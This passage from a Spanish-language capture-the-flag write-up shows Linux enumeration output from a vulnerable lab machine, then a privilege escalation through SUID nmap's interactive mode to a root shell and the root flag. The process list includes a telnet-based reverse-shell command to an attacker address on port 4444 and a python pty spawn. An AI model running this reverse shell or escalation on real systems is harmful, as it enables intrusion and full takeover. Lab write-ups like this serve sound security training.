www-data 5173 0.0 0.3 10596 1948 ? S 06:53 0:00
/usr/sbin/apache2 -k start
root 5184 0.0 5.1 66344 26480 ? Sl 06:53 0:00
/usr/bin/rmiregistry
root 5188 0.0 0.4 12208 2536 ? Sl 06:53 0:00 ruby
/usr/sbin/druby_timeserver.rb
root 5194 0.0 0.4 8540 2368 ? S 06:53 0:00
/usr/bin/unrealircd
root 5204 0.0 0.0 1716 488 tty1 Ss+ 06:53 0:00 /sbin/getty
38400 tty1
root 5207 0.0 2.3 13924 12012 ? S 06:53 0:00 Xtightvnc :0
-desktop X -auth /root/.Xauthority -geometry 1024x768 -depth 24 -rfbwait 120000
-rfbauth /root/.vnc/passwd -rfbport 5900 -fp
/usr/X11R6/lib/X11/fonts/Type1/,/usr/X11R6/lib/X11/fonts/Speedo/,/usr/X11R6/lib/
X11/fonts/misc/,/usr/X11R6/lib/X11/fonts/75dpi/,/usr/X11R6/lib/X11/fonts/100dpi/
,/usr/share/fonts/X11/misc/,/usr/share/fonts/X11/Type1/,/usr/share/fonts/X11/75d
pi/,/usr/share/fonts/X11/100dpi/ -co /etc/X11/rgb
root 5211 0.0 0.2 2724 1192 ? S 06:53 0:00 /bin/sh
/root/.vnc/xstartup
root 5214 0.0 0.4 5936 2576 ? S 06:53 0:00 xterm
-geometry 80x24+10+10 -ls -title X Desktop
root 5217 0.0 0.9 8988 4988 ? S 06:53 0:00 fluxbox
root 5228 0.0 0.2 2852 1544 pts/0 Ss+ 06:53 0:00 -bash
daemon 5475 0.0 0.1 1848 532 ? SN 07:02 0:00 sleep 3980
daemon 5476 0.0 0.1 3164 1024 ? SN 07:02 0:00 telnet
10.10.14.6 4444
daemon 5477 0.0 0.1 3240 844 ? SN 07:02 0:00 sh -c (sleep
3980|telnet 10.10.14.6 4444|while : ; do sh && break; done 2>&1|telnet
10.10.14.6 4444 >/dev/null 2>&1 &)
daemon 5478 0.0 0.2 3236 1448 ? SN 07:02 0:00 sh
daemon 5479 0.0 0.2 3164 1048 ? SN 07:02 0:00 telnet
10.10.14.6 4444
daemon 5489 0.0 0.4 3960 2472 ? SN 07:04 0:00 python -c
import pty; pty.spawn("/bin/sh")
daemon 5490 0.0 0.3 3372 1796 pts/1 SNs 07:04 0:00 /bin/sh
daemon 5541 0.0 0.3 3680 1920 pts/1 SN+ 07:09 0:00 sh lin.sh
daemon 5542 0.0 0.2 3720 1456 pts/1 RN+ 07:09 0:00 sh lin.sh
daemon 5544 0.0 0.0 1712 440 pts/1 SN+ 07:09 0:00 tee -a
daemon 5773 0.0 0.2 3720 1312 pts/1 RN+ 07:09 0:00 sh lin.sh
daemon 5774 0.0 0.1 2364 932 pts/1 RN+ 07:09 0:00 ps aux
[-] Process binaries and associated permissions (from above list):
48K -rwxr-xr-x 1 root root 48K Apr 4 2008 /bin/dd
0 lrwxrwxrwx 1 root root 4 Apr 28 2010 /bin/sh -> bash
16K -rwxr-xr-x 1 root root 15K Apr 14 2008 /sbin/getty
92K -rwxr-xr-x 1 root root 88K Apr 11 2008 /sbin/init
24K -rwxr-xr-x 1 root root 23K Nov 23 2007 /sbin/klogd
16K -rwxr-xr-x 1 root root 15K Dec 3 2007 /sbin/portmap
40K -rwxr-xr-x 1 root root 39K Dec 2 2008 /sbin/rpc.statd
32K -rwxr-xr-x 1 root root 32K Nov 23 2007 /sbin/syslogd
72K -rwxr-xr-x 1 root root 67K Apr 11 2008 /sbin/udevd
32K -rwxr-xr-x 1 root root 31K May 21 2007 /usr/bin/jsvc
0 lrwxrwxrwx 1 root root 29 Apr 28 2010 /usr/bin/rmiregistry ->
/etc/alternatives/rmiregistry
1.4M -rwx------ 1 root root 1.4M May 20 2012 /usr/bin/unrealircd
28K -rwxr-xr-x 1 root root 28K Apr 18 2008 /usr/lib/postfix/master
3.5M -rwxr-xr-x 1 root root 3.5M Mar 21 2008
/usr/lib/postgresql/8.3/bin/postgres
348K -rwxr-xr-x 1 root root 341K Mar 9 2010 /usr/sbin/apache2
16K -rwxr-xr-x 1 root root 16K Feb 20 2007 /usr/sbin/atd
32K -rwxr-xr-x 1 root root 31K Apr 8 2008 /usr/sbin/cron
7.1M -rwxr-xr-x 1 root root 7.1M Mar 28 2008 /usr/sbin/mysqld
348K -rwxr-xr-x 1 root root 343K Apr 9 2008 /usr/sbin/named
952K -rwxr-xr-x 1 root root 948K Apr 28 2010 /usr/sbin/nmbd
36K -rwxr-xr-x 1 root root 35K Dec 2 2008 /usr/sbin/rpc.idmapd
76K -rwxr-xr-x 1 root root 72K Dec 2 2008 /usr/sbin/rpc.mountd
3.0M -rwxr-xr-x 1 root root 3.0M Apr 28 2010 /usr/sbin/smbd
24K -rwxr-xr-x 1 root root 24K Sep 24 2009 /usr/sbin/snmpd
368K -rwxr-xr-x 1 root root 363K Apr 6 2008 /usr/sbin/sshd
140K -rwxr-xr-x 1 root root 135K Dec 3 2007 /usr/sbin/xinetd
[-] Contents of /etc/inetd.conf:
## netbios-ssn stream tcp nowait root /usr/sbin/tcpd
/usr/sbin/smbd
telnet stream tcp nowait telnetd /usr/sbin/tcpd
/usr/sbin/in.telnetd
## ftp stream tcp nowait root /usr/sbin/tcpd
/usr/sbin/in.ftpd
tftp dgram udp wait nobody /usr/sbin/tcpd
/usr/sbin/in.tftpd /srv/tftp
shell stream tcp nowait root /usr/sbin/tcpd
/usr/sbin/in.rshd
login stream tcp nowait root /usr/sbin/tcpd
/usr/sbin/in.rlogind
exec stream tcp nowait root /usr/sbin/tcpd
/usr/sbin/in.rexecd
ingreslock stream tcp nowait root /bin/bash bash -i
[-] The related inetd binary permissions:
-rwxr-xr-x 1 root root 8216 Nov 22 2007 /usr/sbin/in.rexecd
-rwxr-xr-x 1 root root 15620 Nov 22 2007 /usr/sbin/in.rlogind
-rwxr-xr-x 1 root root 14684 Nov 22 2007 /usr/sbin/in.rshd
-rwxr-xr-x 1 root root 36504 Dec 17 2006 /usr/sbin/in.telnetd
-rwxr-xr-x 1 root root 11596 Dec 17 2006 /usr/sbin/in.tftpd
-rwxr-xr-x 1 root root 4504 Jul 30 2007 /usr/sbin/tcpd
-rwxr-xr-x 1 root root 4504 Jul 30 2007 /usr/sbin/tcpd
[-] Contents of /etc/xinetd.conf:
# Simple configuration file for xinetd
#
# Some defaults, and include /etc/xinetd.d/
defaults
{
# Please note that you need a log_type line to be able to use log_on_success
# and log_on_failure. The default is the following :
# log_type = SYSLOG daemon info
}
includedir /etc/xinetd.d
[-] /etc/xinetd.d is included in /etc/xinetd.conf - associated binary
permissions are listed below:
total 32
drwxr-xr-x 2 root root 4096 May 20 2012 .
drwxr-xr-x 95 root root 4096 Oct 30 06:52 ..
-rw-r--r-- 1 root root 798 Dec 3 2007 chargen
-rw-r--r-- 1 root root 660 Dec 3 2007 daytime
-rw-r--r-- 1 root root 549 Dec 3 2007 discard
-rw-r--r-- 1 root root 580 Dec 3 2007 echo
-rw-r--r-- 1 root root 727 Dec 3 2007 time
-rw-r--r-- 1 root root 576 May 20 2012 vsftpd
[-] /etc/init.d/ binary permissions:
total 376
drwxr-xr-x 2 root root 4096 May 20 2012 .
drwxr-xr-x 95 root root 4096 Oct 30 06:52 ..
-rw-r--r-- 1 root root 1335 Apr 19 2008 README
-rwxr-xr-x 1 root root 5736 Feb 1 2008 apache2
-rwxr-xr-x 1 root root 2653 Apr 7 2008 apparmor
-rwxr-xr-x 1 root root 969 Feb 20 2007 atd
-rwxr-xr-x 1 root root 2426 Apr 9 2008 bind9
-rwxr-xr-x 1 root root 3597 Apr 19 2008 bootclean
-rwxr-xr-x 1 root root 2121 Apr 19 2008 bootlogd
-rwxr-xr-x 1 root root 1768 Apr 19 2008 bootmisc.sh
-rwxr-xr-x 1 root root 3454 Apr 19 2008 checkfs.sh
-rwxr-xr-x 1 root root 10602 Apr 19 2008 checkroot.sh
-rwxr-xr-x 1 root root 6355 May 30 2007 console-screen.sh
-rwxr-xr-x 1 root root 1634 Jan 28 2008 console-setup
-rwxr-xr-x 1 root root 1761 Apr 8 2008 cron
-rwxr-xr-x 1 root root 429 May 14 2012 distcc
-rwxr-xr-x 1 root root 1223 Jun 22 2007 dns-clean
-rwxr-xr-x 1 root root 7195 Apr 4 2008 glibc.sh
-rwxr-xr-x 1 root root 1228 Apr 19 2008 halt
-rwxr-xr-x 1 root root 909 Apr 19 2008 hostname.sh
-rwxr-xr-x 1 root root 4521 Apr 14 2008 hwclock.sh
-rwxr-xr-x 1 root root 4528 Apr 14 2008 hwclockfirst.sh
-rwxr-xr-x 1 root root 1376 Jan 28 2008 keyboard-setup
-rwxr-xr-x 1 root root 944 Apr 19 2008 killprocs
-rwxr-xr-x 1 root root 1729 Nov 23 2007 klogd
-rwxr-xr-x 1 root root 748 Jan 23 2006 loopback
-rwxr-xr-x 1 root root 1399 Feb 25 2008 module-init-tools
-rwxr-xr-x 1 root root 596 Apr 19 2008 mountall-bootclean.sh
-rwxr-xr-x 1 root root 2430 Apr 19 2008 mountall.sh
-rwxr-xr-x 1 root root 1465 Apr 19 2008 mountdevsubfs.sh
-rwxr-xr-x 1 root root 1544 Apr 19 2008 mountkernfs.sh
-rwxr-xr-x 1 root root 594 Apr 19 2008 mountnfs-bootclean.sh
-rwxr-xr-x 1 root root 1244 Apr 19 2008 mountoverflowtmp
-rwxr-xr-x 1 root root 3123 Apr 19 2008 mtab.sh
-rwxr-xr-x 1 root root 5755 Mar 27 2008 mysql
-rwxr-xr-x 1 root root 2515 Mar 27 2008 mysql-ndb
-rwxr-xr-x 1 root root 1905 Mar 27 2008 mysql-ndb-mgm
-rwxr-xr-x 1 root root 1772 Dec 3 2007 networking
-rwxr-xr-x 1 root root 5942 Dec 2 2008 nfs-common
-rwxr-xr-x 1 root root 4411 Dec 2 2008 nfs-kernel-server
-rwxr-xr-x 1 root root 2324 Apr 27 2007 openbsd-inetd
-rwxr-xr-x 1 root root 2377 Oct 23 2007 pcmciautils
-rwxr-xr-x 1 root root 1872 Dec 3 2007 portmap
-rwxr-xr-x 1 root root 4202 Apr 18 2008 postfix
-rwxr-xr-x 1 root root 1170 Mar 21 2008 postgresql-8.3
-rwxr-xr-x 1 root root 375 Oct 4 2007 pppd-dns
-rwxr-xr-x 1 root root 1261 Mar 13 2008 procps
-rwxr-xr-x 1 root root 4848 Feb 20 2008 proftpd
-rwxr-xr-x 1 root root 7891 Apr 19 2008 rc
-rwxr-xr-x 1 root root 522 Apr 19 2008 rc.local
-rwxr-xr-x 1 root root 117 Apr 19 2008 rcS
-rwxr-xr-x 1 root root 692 Apr 19 2008 reboot
-rwxr-xr-x 1 root root 1000 Apr 19 2008 rmnologin
-rwxr-xr-x 1 root root 4945 Apr 10 2008 rsync
-rwxr-xr-x 1 root root 1763 May 25 2004 samba
-rwxr-xr-x 1 root root 955 Oct 23 2007 screen-cleanup
-rwxr-xr-x 1 root root 1199 Apr 19 2008 sendsigs
-rwxr-xr-x 1 root root 585 Apr 19 2008 single
-rwxr-xr-x 1 root root 4215 Apr 19 2008 skeleton
-rwxr-xr-x 1 root root 2747 Sep 24 2009 snmpd
-rwxr-xr-x 1 root root 3839 Apr 6 2008 ssh
-rwxr-xr-x 1 root root 510 Apr 19 2008 stop-bootlogd
-rwxr-xr-x 1 root root 647 Apr 19 2008 stop-bootlogd-single
-rwxr-xr-x 1 root root 3343 Nov 23 2007 sysklogd
-rwxr-xr-x 1 root root 6860 Dec 7 2008 tomcat5.5
-rwxr-xr-x 1 root root 2488 Apr 11 2008 udev
-rwxr-xr-x 1 root root 706 Apr 11 2008 udev-finish
-rwxr-xr-x 1 root root 6358 Apr 7 2008 ufw
-rwxr-xr-x 1 root root 4030 Apr 19 2008 umountfs
-rwxr-xr-x 1 root root 1833 Apr 19 2008 umountnfs.sh
-rwxr-xr-x 1 root root 1863 Apr 19 2008 umountroot
-rwxr-xr-x 1 root root 1815 Apr 19 2008 urandom
-rwxr-xr-x 1 root root 2445 Apr 19 2008 waitnfs.sh
-rwxr-xr-x 1 root root 1626 Mar 12 2008 wpa-ifupdown
-rwxr-xr-x 1 root root 1843 May 13 2008 x11-common
-rwxr-xr-x 1 root root 1896 Dec 3 2007 xinetd
-rwxr-xr-x 1 root root 568 Mar 30 2008 xserver-xorg-input-wacom
### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.6.9p10
[-] MYSQL version:
mysql Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2
[+] We can connect to the local MYSQL service as 'root' and without a password!
mysqladmin Ver 8.41 Distrib 5.0.51a, for debian-linux-gnu on i486
Copyright (C) 2000-2006 MySQL AB
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL license
Server version 5.0.51a-3ubuntu5
Protocol version 10
Connection Localhost via UNIX socket
UNIX socket /var/run/mysqld/mysqld.sock
Uptime: 16 min 54 sec
Threads: 1 Questions: 438 Slow queries: 0 Opens: 419 Flush tables: 1 Open
tables: 64 Queries per second avg: 0.432
[-] Postgres version:
psql (PostgreSQL) 8.3.1
contains support for command-line editing
[-] Apache version:
Server version: Apache/2.2.8 (Ubuntu)
Server built: Mar 9 2010 20:45:36
[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/nmap
/usr/bin/gcc
/usr/bin/curl
[-] Installed compilers:
ii distcc 2.18.3-4.1ubuntu1
Simple distributed compiler client and serve
ii g++ 4:4.2.3-1ubuntu6
The GNU C++ compiler
ii g++-4.2 4.2.4-1ubuntu4
The GNU C++ compiler
ii gcc 4:4.2.3-1ubuntu6
The GNU C compiler
ii gcc-4.2 4.2.4-1ubuntu4
The GNU C compiler
ii gcj-4.2 4.2.4-1ubuntu3
The GNU compiler for Java(TM)
ii libecj-java 3.3.0+0728-5
Eclipse Java compiler (library)
ii libecj-java-gcj 3.3.0+0728-5
Eclipse Java compiler (native library)
[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1549 Mar 14 2017 /etc/passwd
-rw-r--r-- 1 root root 784 Mar 14 2017 /etc/group
-rw-r--r-- 1 root root 497 May 13 2012 /etc/profile
-rw-r----- 1 root shadow 1171 Mar 14 2017 /etc/shadow
[-] SUID files:
-rwsr-xr-x 1 root root 63584 Apr 14 2008 /bin/umount
-rwsr-xr-- 1 root fuse 20056 Feb 26 2008 /bin/fusermount
-rwsr-xr-x 1 root root 25540 Apr 2 2008 /bin/su
-rwsr-xr-x 1 root root 81368 Apr 14 2008 /bin/mount
-rwsr-xr-x 1 root root 30856 Dec 10 2007 /bin/ping
-rwsr-xr-x 1 root root 26684 Dec 10 2007 /bin/ping6
-rwsr-xr-x 1 root root 65520 Dec 2 2008 /sbin/mount.nfs
-rwsr-xr-- 1 root dhcp 2960 Apr 2 2008 /lib/dhcp3-client/call-dhclient-script
-rwsr-xr-x 2 root root 107776 Feb 25 2008 /usr/bin/sudoedit
-rwsr-sr-x 1 root root 7460 Jun 25 2008 /usr/bin/X
-rwsr-xr-x 1 root root 8524 Nov 22 2007 /usr/bin/netkit-rsh
-rwsr-xr-x 1 root root 37360 Apr 2 2008 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 12296 Dec 10 2007 /usr/bin/traceroute6.iputils
-rwsr-xr-x 2 root root 107776 Feb 25 2008 /usr/bin/sudo
-rwsr-xr-x 1 root root 12020 Nov 22 2007 /usr/bin/netkit-rlogin
-rwsr-xr-x 1 root root 11048 Dec 10 2007 /usr/bin/arping
-rwsr-sr-x 1 daemon daemon 38464 Feb 20 2007 /usr/bin/at
-rwsr-xr-x 1 root root 19144 Apr 2 2008 /usr/bin/newgrp
-rwsr-xr-x 1 root root 28624 Apr 2 2008 /usr/bin/chfn
-rwsr-xr-x 1 root root 780676 Apr 8 2008 /usr/bin/nmap
-rwsr-xr-x 1 root root 23952 Apr 2 2008 /usr/bin/chsh
-rwsr-xr-x 1 root root 15952 Nov 22 2007 /usr/bin/netkit-rcp
-rwsr-xr-x 1 root root 29104 Apr 2 2008 /usr/bin/passwd
-rwsr-xr-x 1 root root 46084 Mar 31 2008 /usr/bin/mtr
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27 2008 /usr/sbin/uuidd
-rwsr-xr-- 1 root dip 269256 Oct 4 2007 /usr/sbin/pppd
-rwsr-xr-- 1 root telnetd 6040 Dec 17 2006 /usr/lib/telnetlogin
-rwsr-xr-- 1 root www-data 10276 Mar 9 2010 /usr/lib/apache2/suexec
-rwsr-xr-x 1 root root 4524 Nov 5 2007 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 165748 Apr 6 2008 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 9624 Aug 17 2009 /usr/lib/pt_chown
[+] Possibly interesting SUID files:
-rwsr-xr-- 1 root dhcp 2960 Apr 2 2008 /lib/dhcp3-client/call-dhclient-script
-rwsr-xr-x 1 root root 780676 Apr 8 2008 /usr/bin/nmap
-rwsr-xr-x 1 root root 46084 Mar 31 2008 /usr/bin/mtr
[-] SGID files:
-rwxr-sr-x 1 root shadow 19584 Apr 9 2008 /sbin/unix_chkpwd
-rwxr-sr-x 1 root utmp 3192 Apr 22 2008 /usr/bin/Eterm
-rwsr-sr-x 1 root root 7460 Jun 25 2008 /usr/bin/X
-rwxr-sr-x 1 root tty 8192 Dec 12 2007 /usr/bin/bsd-write
-rwxr-sr-x 1 root ssh 76580 Apr 6 2008 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 30508 Mar 8 2008 /usr/bin/mlocate
-rwxr-sr-x 1 root crontab 26928 Apr 8 2008 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 37904 Apr 2 2008 /usr/bin/chage
-rwxr-sr-x 1 root utmp 308228 Oct 23 2007 /usr/bin/screen
-rwxr-sr-x 1 root shadow 16424 Apr 2 2008 /usr/bin/expiry
-rwsr-sr-x 1 daemon daemon 38464 Feb 20 2007 /usr/bin/at
-rwxr-sr-x 1 root utmp 306996 Jan 2 2009 /usr/bin/xterm
-rwxr-sr-x 1 root tty 9960 Apr 14 2008 /usr/bin/wall
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27 2008 /usr/sbin/uuidd
-r-xr-sr-x 1 root postdrop 10312 Apr 18 2008 /usr/sbin/postqueue
-r-xr-sr-x 1 root postdrop 10036 Apr 18 2008 /usr/sbin/postdrop
[+] Hosts.equiv file and contents:
-rw-r--r-- 1 root root 121 May 20 2012 /etc/hosts.equiv
# /etc/hosts.equiv: list of hosts and users that are granted "trusted" r
# command access to your system .
+ +
[-] NFS config details:
-rw-r--r-- 1 root root 367 May 13 2012 /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync) hostname2(ro,sync)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt)
# /srv/nfs4/homes gss/krb5i(rw,sync)
#
/ *(rw,sync,no_root_squash,no_subtree_check)
[-] Can't search *.conf files as no keyword was entered
[-] Can't search *.php files as no keyword was entered
[-] Can't search *.log files as no keyword was entered
[-] Can't search *.ini files as no keyword was entered
[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 552 Apr 9 2008 /etc/pam.conf
-rw-r--r-- 1 root root 899 Nov 6 2007 /etc/gssapi_mech.conf
-rw-r----- 1 root fuse 216 Feb 26 2008 /etc/fuse.conf
-rw-r--r-- 1 root root 2405 Mar 13 2008 /etc/sysctl.conf
-rw-r--r-- 1 root root 2689 Apr 4 2008 /etc/gai.conf
-rw-r--r-- 1 root root 4430 May 20 2012 /etc/vsftpd.conf
-rw-r--r-- 1 root root 2975 Mar 16 2010 /etc/adduser.conf
-rw-r--r-- 1 root root 2969 Mar 11 2008 /etc/debconf.conf
-rw-r--r-- 1 root root 92 Oct 20 2007 /etc/host.conf
-rw-r--r-- 1 root root 13144 Nov 16 2007 /etc/ltrace.conf
-rw-r--r-- 1 root root 423 May 20 2012 /etc/hesiod.conf
-rw-r--r-- 1 root root 34 Mar 16 2010 /etc/ld.so.conf
-rw-r--r-- 1 root root 599 Jun 19 2006 /etc/logrotate.conf
-rw-r--r-- 1 root root 354 Mar 5 2007 /etc/fdmount.conf
-rw-r--r-- 1 root root 529 May 20 2012 /etc/inetd.conf
-rw-r--r-- 1 root root 475 Oct 20 2007 /etc/nsswitch.conf
-rw-r--r-- 1 root root 214 Mar 8 2008 /etc/updatedb.conf
-rw-r--r-- 1 root root 43 Mar 14 2017 /etc/resolv.conf
-rw-r--r-- 1 root root 34 Feb 18 2008 /etc/e2fsck.conf
-rw-r--r-- 1 root root 4793 Mar 28 2008 /etc/hdparm.conf
-rw-r--r-- 1 root root 342 Mar 16 2010 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 417 Mar 27 2008 /etc/mke2fs.conf
-rw-r--r-- 1 root root 15280 Apr 28 2010 /etc/devscripts.conf
-rw-r--r-- 1 root root 1614 Nov 23 2007 /etc/syslog.conf
-rw-r--r-- 1 root root 1260 Feb 21 2008 /etc/ucf.conf
-rw-r--r-- 1 root root 145 Dec 2 2008 /etc/idmapd.conf
-rw-r--r-- 1 root root 600 Oct 23 2007 /etc/deluser.conf
-rw-r--r-- 1 root root 240 Mar 16 2010 /etc/kernel-img.conf
-rw-r--r-- 1 root root 1878 May 4 2008 /etc/cowpoke.conf
-rw-r--r-- 1 root root 289 May 20 2012 /etc/xinetd.conf
[+] Root's history files are accessible!
lrwxrwxrwx 1 root root 9 May 14 2012 /root/.bash_history -> /dev/null
[-] Location and contents (if accessible) of .bash_history file(s):
/home/makis/.bash_history
/home/user/.bash_history
[-] Any interesting mail in /var/mail:
total 12
drwxrwsr-x 2 root mail 4096 Mar 14 2017 .
drwxr-xr-x 15 root root 4096 May 20 2012 ..
-rw------- 1 root mail 1438 Mar 14 2017 root
### SCAN COMPLETE ####################################
En la parte de SUID files vemos que aparece que nmap tiene Setuid activo.
-rwsr-xr-x 1 root root 780676 Apr 8 2008 /usr/bin/nmap
Desde nmap podemos lanzar una shell con privilegios[1] y de ese modo hariamos
la escalada de privilegios.
sh-3.2$ nmap --interactive
Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h for help
nmap> !sh
sh-3.2# whoami
root
root.txt
Ya solo nos quedaria obtener el flag de root.
sh-3.2# cd /root
sh-3.2# ls
Desktop reset_logs.sh root.txt vnc.log
sh-3.2# cat root.txt
92caac3be140ef409e45721348a4eXXX
End
Y con esto ya tendriamos el flag del "user" y el flag de "root".
[1] https://pentestlab.blog/category/privilege-escalation/